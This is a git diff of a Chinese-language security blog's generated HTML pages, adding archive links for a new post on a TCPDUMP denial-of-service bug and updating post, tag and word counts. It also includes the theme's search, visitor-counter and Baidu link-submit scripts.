+
+
+
+
+
+
+  
+
+  <script type="text/javascript">
+    // Popup Window;
+    var isfetched = false;
+    var isXml = true;
+    // Search DB path;
+    var search_path = "search.xml";
+    if (search_path.length === 0) {
+      search_path = "search.xml";
+    } else if (/json$/i.test(search_path)) {
+      isXml = false;
+    }
+    var path = "/" + search_path;
+    // monitor main search box;
+
+    var onPopupClose = function (e) {
+      $('.popup').hide();
+      $('#local-search-input').val('');
+      $('.search-result-list').remove();
+      $('#no-result').remove();
+      $(".local-search-pop-overlay").remove();
+      $('body').css('overflow', '');
+    }
+
+    function proceedsearch() {
+      $("body")
+        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
+        .css('overflow', 'hidden');
+      $('.search-popup-overlay').click(onPopupClose);
+      $('.popup').toggle();
+      var $localSearchInput = $('#local-search-input');
+      $localSearchInput.attr("autocapitalize", "none");
+      $localSearchInput.attr("autocorrect", "off");
+      $localSearchInput.focus();
+    }
+
+    // search function;
+    var searchFunc = function(path, search_id, content_id) {
+      'use strict';
+
+      // start loading animation
+      $("body")
+        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
+          '<div id="search-loading-icon">' +
+          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
+          '</div>' +
+          '</div>')
+        .css('overflow', 'hidden');
+      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');
+
+      $.ajax({
+        url: path,
+        dataType: isXml ? "xml" : "json",
+        async: true,
+        success: function(res) {
+          // get the contents from search data
+          isfetched = true;
+          $('.popup').detach().appendTo('.header-inner');
+          var datas = isXml ? $("entry", res).map(function() {
+            return {
+              title: $("title", this).text(),
+              content: $("content",this).text(),
+              url: $("url" , this).text()
+            };
+          }).get() : res;
+          var input = document.getElementById(search_id);
+          var resultContent = document.getElementById(content_id);
+          var inputEventFunction = function() {
+            var searchText = input.value.trim().toLowerCase();
+            var keywords = searchText.split(/[\s\-]+/);
+            if (keywords.length > 1) {
+              keywords.push(searchText);
+            }
+            var resultItems = [];
+            if (searchText.length > 0) {
+              // perform local searching
+              datas.forEach(function(data) {
+                var isMatch = false;
+                var hitCount = 0;
+                var searchTextCount = 0;
+                var title = data.title.trim();
+                var titleInLowerCase = title.toLowerCase();
+                var content = data.content.trim().replace(/<[^>]+>/g,"");
+                var contentInLowerCase = content.toLowerCase();
+                var articleUrl = decodeURIComponent(data.url);
+                var indexOfTitle = [];
+                var indexOfContent = [];
+                // only match articles with not empty titles
+                if(title != '') {
+                  keywords.forEach(function(keyword) {
+                    function getIndexByWord(word, text, caseSensitive) {
+                      var wordLen = word.length;
+                      if (wordLen === 0) {
+                        return [];
+                      }
+                      var startPosition = 0, position = [], index = [];
+                      if (!caseSensitive) {
+                        text = text.toLowerCase();
+                        word = word.toLowerCase();
+                      }
+                      while ((position = text.indexOf(word, startPosition)) > -1) {
+                        index.push({position: position, word: word});
+                        startPosition = position + wordLen;
+                      }
+                      return index;
+                    }
+
+                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
+                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
+                  });
+                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
+                    isMatch = true;
+                    hitCount = indexOfTitle.length + indexOfContent.length;
+                  }
+                }
+
+                // show search results
+
+                if (isMatch) {
+                  // sort index by position of keyword
+
+                  [indexOfTitle, indexOfContent].forEach(function (index) {
+                    index.sort(function (itemLeft, itemRight) {
+                      if (itemRight.position !== itemLeft.position) {
+                        return itemRight.position - itemLeft.position;
+                      } else {
+                        return itemLeft.word.length - itemRight.word.length;
+                      }
+                    });
+                  });
+
+                  // merge hits into slices
+
+                  function mergeIntoSlice(text, start, end, index) {
+                    var item = index[index.length - 1];
+                    var position = item.position;
+                    var word = item.word;
+                    var hits = [];
+                    var searchTextCountInSlice = 0;
+                    while (position + word.length <= end && index.length != 0) {
+                      if (word === searchText) {
+                        searchTextCountInSlice++;
+                      }
+                      hits.push({position: position, length: word.length});
+                      var wordEnd = position + word.length;
+
+                      // move to next position of hit
+
+                      index.pop();
+                      while (index.length != 0) {
+                        item = index[index.length - 1];
+                        position = item.position;
+                        word = item.word;
+                        if (wordEnd > position) {
+                          index.pop();
+                        } else {
+                          break;
+                        }
+                      }
+                    }
+                    searchTextCount += searchTextCountInSlice;
+                    return {
+                      hits: hits,
+                      start: start,
+                      end: end,
+                      searchTextCount: searchTextCountInSlice
+                    };
+                  }
+
+                  var slicesOfTitle = [];
+                  if (indexOfTitle.length != 0) {
+                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
+                  }
+
+                  var slicesOfContent = [];
+                  while (indexOfContent.length != 0) {
+                    var item = indexOfContent[indexOfContent.length - 1];
+                    var position = item.position;
+                    var word = item.word;
+                    // cut out 100 characters
+                    var start = position - 20;
+                    var end = position + 80;
+                    if(start < 0){
+                      start = 0;
+                    }
+                    if (end < position + word.length) {
+                      end = position + word.length;
+                    }
+                    if(end > content.length){
+                      end = content.length;
+                    }
+                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
+                  }
+
+                  // sort slices in content by search text's count and hits' count
+
+                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
+                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
+                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
+                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
+                      return sliceRight.hits.length - sliceLeft.hits.length;
+                    } else {
+                      return sliceLeft.start - sliceRight.start;
+                    }
+                  });
+
+                  // select top N slices in content
+
+                  var upperBound = parseInt('1');
+                  if (upperBound >= 0) {
+                    slicesOfContent = slicesOfContent.slice(0, upperBound);
+                  }
+
+                  // highlight title and content
+
+                  function highlightKeyword(text, slice) {
+                    var result = '';
+                    var prevEnd = slice.start;
+                    slice.hits.forEach(function (hit) {
+                      result += text.substring(prevEnd, hit.position);
+                      var end = hit.position + hit.length;
+                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
+                      prevEnd = end;
+                    });
+                    result += text.substring(prevEnd, slice.end);
+                    return result;
+                  }
+
+                  var resultItem = '';
+
+                  if (slicesOfTitle.length != 0) {
+                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
+                  } else {
+                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
+                  }
+
+                  slicesOfContent.forEach(function (slice) {
+                    resultItem += "<a href='" + articleUrl + "'>" +
+                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
+                      "...</p>" + "</a>";
+                  });
+
+                  resultItem += "</li>";
+                  resultItems.push({
+                    item: resultItem,
+                    searchTextCount: searchTextCount,
+                    hitCount: hitCount,
+                    id: resultItems.length
+                  });
+                }
+              })
+            };
+            if (keywords.length === 1 && keywords[0] === "") {
+              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
+            } else if (resultItems.length === 0) {
+              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
+            } else {
+              resultItems.sort(function (resultLeft, resultRight) {
+                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
+                  return resultRight.searchTextCount - resultLeft.searchTextCount;
+                } else if (resultLeft.hitCount !== resultRight.hitCount) {
+                  return resultRight.hitCount - resultLeft.hitCount;
+                } else {
+                  return resultRight.id - resultLeft.id;
+                }
+              });
+              var searchResultList = '<ul class=\"search-result-list\">';
+              resultItems.forEach(function (result) {
+                searchResultList += result.item;
+              })
+              searchResultList += "</ul>";
+              resultContent.innerHTML = searchResultList;
+            }
+          }
+
+          if ('auto' === 'auto') {
+            input.addEventListener('input', inputEventFunction);
+          } else {
+            $('.search-icon').click(inputEventFunction);
+            input.addEventListener('keypress', function (event) {
+              if (event.keyCode === 13) {
+                inputEventFunction();
+              }
+            });
+          }
+
+          // remove loading animation
+          $(".local-search-pop-overlay").remove();
+          $('body').css('overflow', '');
+
+          proceedsearch();
+        }
+      });
+    }
+
+    // handle and trigger popup window;
+    $('.popup-trigger').click(function(e) {
+      e.stopPropagation();
+      if (isfetched === false) {
+        searchFunc(path, 'local-search-input', 'local-search-result');
+      } else {
+        proceedsearch();
+      };
+    });
+
+    $('.popup-btn-close').click(onPopupClose);
+    $('.popup').click(function(e){
+      e.stopPropagation();
+    });
+    $(document).on('keyup', function (event) {
+      var shouldDismissSearchPopup = event.which === 27 &&
+        $('.search-popup').is(':visible');
+      if (shouldDismissSearchPopup) {
+        onPopupClose();
+      }
+    });
+  </script>
+
+
+
+
+
+  
+
+  
+  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
+  <script>AV.initialize("EWwoJgHNdlj6iBjiFlMcabUO-gzGzoHsz", "x8FxDrYG79C8YFrTww9ljo8K");</script>
+  <script>
+    function showTime(Counter) {
+      var query = new AV.Query(Counter);
+      var entries = [];
+      var $visitors = $(".leancloud_visitors");
+
+      $visitors.each(function () {
+        entries.push( $(this).attr("id").trim() );
+      });
+
+      query.containedIn('url', entries);
+      query.find()
+        .done(function (results) {
+          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';
+
+          if (results.length === 0) {
+            $visitors.find(COUNT_CONTAINER_REF).text(0);
+            return;
+          }
+
+          for (var i = 0; i < results.length; i++) {
+            var item = results[i];
+            var url = item.get('url');
+            var time = item.get('time');
+            var element = document.getElementById(url);
+
+            $(element).find(COUNT_CONTAINER_REF).text(time);
+          }
+          for(var i = 0; i < entries.length; i++) {
+            var url = entries[i];
+            var element = document.getElementById(url);
+            var countSpan = $(element).find(COUNT_CONTAINER_REF);
+            if( countSpan.text() == '') {
+              countSpan.text(0);
+            }
+          }
+        })
+        .fail(function (object, error) {
+          console.log("Error: " + error.code + " " + error.message);
+        });
+    }
+
+    function addCount(Counter) {
+      var $visitors = $(".leancloud_visitors");
+      var url = $visitors.attr('id').trim();
+      var title = $visitors.attr('data-flag-title').trim();
+      var query = new AV.Query(Counter);
+
+      query.equalTo("url", url);
+      query.find({
+        success: function(results) {
+          if (results.length > 0) {
+            var counter = results[0];
+            counter.fetchWhenSave(true);
+            counter.increment("time");
+            counter.save(null, {
+              success: function(counter) {
+                var $element = $(document.getElementById(url));
+                $element.find('.leancloud-visitors-count').text(counter.get('time'));
+              },
+              error: function(counter, error) {
+                console.log('Failed to save Visitor num, with error message: ' + error.message);
+              }
+            });
+          } else {
+            var newcounter = new Counter();
+            /* Set ACL */
+            var acl = new AV.ACL();
+            acl.setPublicReadAccess(true);
+            acl.setPublicWriteAccess(true);
+            newcounter.setACL(acl);
+            /* End Set ACL */
+            newcounter.set("title", title);
+            newcounter.set("url", url);
+            newcounter.set("time", 1);
+            newcounter.save(null, {
+              success: function(newcounter) {
+                var $element = $(document.getElementById(url));
+                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
+              },
+              error: function(newcounter, error) {
+                console.log('Failed to create');
+              }
+            });
+          }
+        },
+        error: function(error) {
+          console.log('Error:' + error.code + " " + error.message);
+        }
+      });
+    }
+
+    $(function() {
+      var Counter = AV.Object.extend("Counter");
+      if ($('.leancloud_visitors').length == 1) {
+        addCount(Counter);
+      } else if ($('.post-title-link').length > 1) {
+        showTime(Counter);
+      }
+    });
+  </script>
+
+
+
+  
+
+  
+<script>
+(function(){
+    var bp = document.createElement('script');
+    var curProtocol = window.location.protocol.split(':')[0];
+    if (curProtocol === 'https') {
+        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
+    }
+    else {
+        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
+    }
+    var s = document.getElementsByTagName("script")[0];
+    s.parentNode.insertBefore(bp, s);
+})();
+</script>
+
+
+  
+  
+
+  
+
+  
+
+  
+
+</body>
+</html>
diff --git a/2019/01/16/wifi半双工侧信道攻击学习笔记/index.html b/2019/01/16/wifi半双工侧信道攻击学习笔记/index.html
index 92170cec..044e1623 100644
--- a/2019/01/16/wifi半双工侧信道攻击学习笔记/index.html
+++ b/2019/01/16/wifi半双工侧信道攻击学习笔记/index.html
@@ -662,8 +662,8 @@ Server   -------wire----------|
         <div class="post-nav">
           <div class="post-nav-next post-nav-item">
             
-              <a href="/2018/12/23/基于规则引擎发现IOT设备/" rel="next" title="基于采集规则引擎的物联网设备发现方法">
-                <i class="fa fa-chevron-left"></i> 基于采集规则引擎的物联网设备发现方法
+              <a href="/2018/12/25/TCPDUMP拒绝服务攻击漏洞/" rel="next" title="TCPDUMP拒绝服务攻击漏洞">
+                <i class="fa fa-chevron-left"></i> TCPDUMP拒绝服务攻击漏洞
               </a>
             
           </div>
@@ -760,7 +760,7 @@ Server   -------wire----------|
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -782,7 +782,7 @@ Server   -------wire----------|
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -869,7 +869,7 @@ Server   -------wire----------|
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/2019/02/22/qq数据库的加密解密/index.html b/2019/02/22/qq数据库的加密解密/index.html
index 0db1c623..8d362bb4 100644
--- a/2019/02/22/qq数据库的加密解密/index.html
+++ b/2019/02/22/qq数据库的加密解密/index.html
@@ -609,7 +609,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -631,7 +631,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -718,7 +718,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/2019/03/16/小米固件工具mkxqimage/index.html b/2019/03/16/小米固件工具mkxqimage/index.html
index d34581a6..cb278a67 100644
--- a/2019/03/16/小米固件工具mkxqimage/index.html
+++ b/2019/03/16/小米固件工具mkxqimage/index.html
@@ -616,7 +616,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -638,7 +638,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -725,7 +725,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/2019/03/23/auto-send-WX/index.html b/2019/03/23/auto-send-WX/index.html
index 1b691a0d..02c41077 100644
--- a/2019/03/23/auto-send-WX/index.html
+++ b/2019/03/23/auto-send-WX/index.html
@@ -626,7 +626,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -648,7 +648,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -735,7 +735,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/2019/03/25/Samba-CVE/index.html b/2019/03/25/Samba-CVE/index.html
index f61b7732..3c0408f9 100644
--- a/2019/03/25/Samba-CVE/index.html
+++ b/2019/03/25/Samba-CVE/index.html
@@ -651,7 +651,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -673,7 +673,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -760,7 +760,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/2019/03/28/逆向工程实验/index.html b/2019/03/28/逆向工程实验/index.html
index 266ab544..be000b10 100644
--- a/2019/03/28/逆向工程实验/index.html
+++ b/2019/03/28/逆向工程实验/index.html
@@ -754,7 +754,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -776,7 +776,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -863,7 +863,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/2019/04/15/Caving-db-storage/index.html b/2019/04/15/Caving-db-storage/index.html
index 48c510ee..e7eb6f7e 100644
--- a/2019/04/15/Caving-db-storage/index.html
+++ b/2019/04/15/Caving-db-storage/index.html
@@ -675,7 +675,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -697,7 +697,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -784,7 +784,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/2019/04/21/XIAOMI-UPnP/index.html b/2019/04/21/XIAOMI-UPnP/index.html
index 3bd30cf1..ecfcd64c 100644
--- a/2019/04/21/XIAOMI-UPnP/index.html
+++ b/2019/04/21/XIAOMI-UPnP/index.html
@@ -798,7 +798,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -820,7 +820,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -907,7 +907,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/2019/05/13/PE-file/index.html b/2019/05/13/PE-file/index.html
index 56bac86f..55984e1a 100644
--- a/2019/05/13/PE-file/index.html
+++ b/2019/05/13/PE-file/index.html
@@ -718,7 +718,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -740,7 +740,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -827,7 +827,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/2019/05/14/pack-and-unpack/index.html b/2019/05/14/pack-and-unpack/index.html
index cd98188d..28eb3761 100644
--- a/2019/05/14/pack-and-unpack/index.html
+++ b/2019/05/14/pack-and-unpack/index.html
@@ -640,7 +640,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -662,7 +662,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -749,7 +749,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/2019/07/01/AFL-first-learn/index.html b/2019/07/01/AFL-first-learn/index.html
index 4b491495..004e277b 100644
--- a/2019/07/01/AFL-first-learn/index.html
+++ b/2019/07/01/AFL-first-learn/index.html
@@ -869,7 +869,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -891,7 +891,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -978,7 +978,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/about/index.html b/about/index.html
index b4b0b780..b52aa349 100644
--- a/about/index.html
+++ b/about/index.html
@@ -367,7 +367,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -389,7 +389,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -460,7 +460,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/archives/2000/01/index.html b/archives/2000/01/index.html
index 82d52cfb..ad092b85 100644
--- a/archives/2000/01/index.html
+++ b/archives/2000/01/index.html
@@ -299,7 +299,7 @@
         
           
         
-        嗯..! 目前共计 15 篇日志。 继续努力。
+        嗯..! 目前共计 16 篇日志。 继续努力。
       </span>
 
       
@@ -397,7 +397,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -419,7 +419,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -490,7 +490,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/archives/2000/index.html b/archives/2000/index.html
index 00b71311..07bdcd7b 100644
--- a/archives/2000/index.html
+++ b/archives/2000/index.html
@@ -299,7 +299,7 @@
         
           
         
-        嗯..! 目前共计 15 篇日志。 继续努力。
+        嗯..! 目前共计 16 篇日志。 继续努力。
       </span>
 
       
@@ -397,7 +397,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -419,7 +419,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -490,7 +490,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/archives/2018/11/index.html b/archives/2018/11/index.html
index 853c5263..1760322b 100644
--- a/archives/2018/11/index.html
+++ b/archives/2018/11/index.html
@@ -299,7 +299,7 @@
         
           
         
-        嗯..! 目前共计 15 篇日志。 继续努力。
+        嗯..! 目前共计 16 篇日志。 继续努力。
       </span>
 
       
@@ -397,7 +397,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -419,7 +419,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -490,7 +490,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/archives/2018/12/index.html b/archives/2018/12/index.html
index 05134dd7..2baa7261 100644
--- a/archives/2018/12/index.html
+++ b/archives/2018/12/index.html
@@ -299,7 +299,7 @@
         
           
         
-        嗯..! 目前共计 15 篇日志。 继续努力。
+        嗯..! 目前共计 16 篇日志。 继续努力。
       </span>
 
       
@@ -318,6 +318,41 @@
 
         
 
+  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
+    <header class="post-header">
+
+      <h2 class="post-title">
+        
+            <a class="post-title-link" href="/2018/12/25/TCPDUMP拒绝服务攻击漏洞/" itemprop="url">
+              
+                <span itemprop="name">TCPDUMP拒绝服务攻击漏洞</span>
+              
+            </a>
+        
+      </h2>
+
+      <div class="post-meta">
+        <time class="post-time" itemprop="dateCreated" datetime="2018-12-25T12:26:05+08:00" content="2018-12-25">
+          12-25
+        </time>
+      </div>
+
+    </header>
+  </article>
+
+
+
+      
+
+        
+        
+        
+
+        
+        
+
+        
+
   <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
     <header class="post-header">
 
@@ -432,7 +467,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -454,7 +489,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -525,7 +560,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/archives/2018/index.html b/archives/2018/index.html
index f58e81f7..f1db4943 100644
--- a/archives/2018/index.html
+++ b/archives/2018/index.html
@@ -299,7 +299,7 @@
         
           
         
-        嗯..! 目前共计 15 篇日志。 继续努力。
+        嗯..! 目前共计 16 篇日志。 继续努力。
       </span>
 
       
@@ -318,6 +318,41 @@
 
         
 
+  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
+    <header class="post-header">
+
+      <h2 class="post-title">
+        
+            <a class="post-title-link" href="/2018/12/25/TCPDUMP拒绝服务攻击漏洞/" itemprop="url">
+              
+                <span itemprop="name">TCPDUMP拒绝服务攻击漏洞</span>
+              
+            </a>
+        
+      </h2>
+
+      <div class="post-meta">
+        <time class="post-time" itemprop="dateCreated" datetime="2018-12-25T12:26:05+08:00" content="2018-12-25">
+          12-25
+        </time>
+      </div>
+
+    </header>
+  </article>
+
+
+
+      
+
+        
+        
+        
+
+        
+        
+
+        
+
   <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
     <header class="post-header">
 
@@ -467,7 +502,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -489,7 +524,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -560,7 +595,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/archives/2019/01/index.html b/archives/2019/01/index.html
index e82f10c8..de6e4bfe 100644
--- a/archives/2019/01/index.html
+++ b/archives/2019/01/index.html
@@ -299,7 +299,7 @@
         
           
         
-        嗯..! 目前共计 15 篇日志。 继续努力。
+        嗯..! 目前共计 16 篇日志。 继续努力。
       </span>
 
       
@@ -397,7 +397,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -419,7 +419,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -490,7 +490,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
